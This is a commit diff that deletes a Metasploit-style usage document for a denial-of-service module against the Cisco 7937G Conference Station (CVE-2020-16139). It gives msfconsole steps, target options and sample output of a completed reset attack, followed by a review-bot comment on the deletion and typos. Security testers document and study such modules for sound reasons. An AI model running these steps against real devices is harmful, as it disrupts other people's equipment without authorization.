parent
d1afe60262
commit
f6581b9518
|
@ -1,30 +0,0 @@
|
||||||
## Vulnerable Application
|
|
||||||
|
|
||||||
1. Obtain a Cisco 7937G Conference Station.
|
|
||||||
2. Enable Web Access on the device (default configuration).
|
|
||||||
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
|
||||||
|
|
||||||
## Verification Steps
|
|
||||||
|
|
||||||
1. Start msfconsole
|
|
||||||
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
|
||||||
3. Do: `set RHOST 192.168.1.10`
|
|
||||||
4. Do: `run`
|
|
||||||
5. The conference station should become inoperable and then power cycle itself.
|
|
||||||
|
|
||||||
## Options
|
|
||||||
|
|
||||||
1. rhost (required) - Target address
|
|
||||||
|
|
||||||
## Scenarios
|
|
||||||
|
|
||||||
Because both successful and unsuccessful attacks result in the request timing out, there
|
|
||||||
is no way to be sure that the attack was completed. It is recommended to attempt a ping
|
|
||||||
to the device immediately afterward to verify device is offline/reseting.
|
|
||||||
|
|
||||||
```
|
|
||||||
[*] Starting server...
|
|
||||||
[*] 192.168.110.209 - Sending DoS packets. Stand by.
|
|
||||||
[*] 192.168.110.209 - DoS reset attack completed!
|
|
||||||
[*] Auxiliary module execution completed
|
|
||||||
```
|
|
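Review bot: the hunk header `-1,30 +0,0` removes this module document in full, and no replacement file is visible in this commit, so the Scenarios caveat (successful and unsuccessful runs both time out, so ping the device afterwards to confirm it is offline) is lost along with the Verification Steps. If the module is being renamed or relocated, move the document in the same commit rather than deleting it. If it is re-added, fix "all version are likely vulnerable" and "reseting", list the option as `RHOST` to match `set RHOST 192.168.1.10`, and reconcile that address with the `192.168.110.209` shown in the sample output.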